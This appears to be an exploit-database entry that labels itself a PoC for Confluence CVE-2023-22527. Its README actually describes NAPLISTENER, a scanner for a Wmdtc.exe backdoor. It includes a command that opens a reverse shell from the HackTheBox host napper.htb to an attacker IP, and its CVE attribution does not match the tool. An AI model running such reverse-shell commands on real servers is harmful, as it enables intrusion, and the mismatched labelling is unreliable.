PoC details: d4ded72dc307cc51a4ee2c2d3723df106caad4dd

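Source
Related vulnerability
Title: Atlassian Confluence security vulnerability (CVE-2023-22527)
Description: Atlassian Confluence is an enterprise knowledge management and collaboration software suite from the Australian company Atlassian, which can also be used to build corporate wikis. Atlassian Confluence Data Center and Server contains a security vulnerability caused by a template injection flaw that allows an unauthenticated attacker to achieve remote code execution on affected instances.
Description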
PoC for the NAPLISTENER exploit: https://nvd.nist.gov/vuln/detail/CVE-2023-22527 (Purpose: To practice automating exploits)
Introduction
# REF2924

NAPLISTENER is a backdoor scanner for the Wmdtc.exe backdoor associated with the REF2924 APT group.

We can use this tool on both Windows and Linux to scan target servers.

If you find the field [Microsoft HTTPAPI/2.0] in a website's "/" request header, you can try scanning for the organization's backdoor.

When the script is run for the first time, it automatically downloads the files it depends on.

# SCAN

`$ python3 wmdtc_backdoor.py -u "https://napper.htb"`

# Reverse Shell

`$ python3 wmdtc_backdoor.py -u "https://napper.htb" -ip_address 10.10.16.15 -port 10032`

![image.png](https://image.3001.net/images/20240505/1714842481_66366b7107e3b4577ca02.png!small)

[Reference Documentation](https://github.com/ttate10/CVE-2023-22527/files/15300630/Napper.pdf)
File snapshot

[4.0K] /data/pocs/d4ded72dc307cc51a4ee2c2d3723df106caad4dd
├── [ 801] README.md
└── [ 12K] wmdtc_backdoor.py

0 directories, 2 files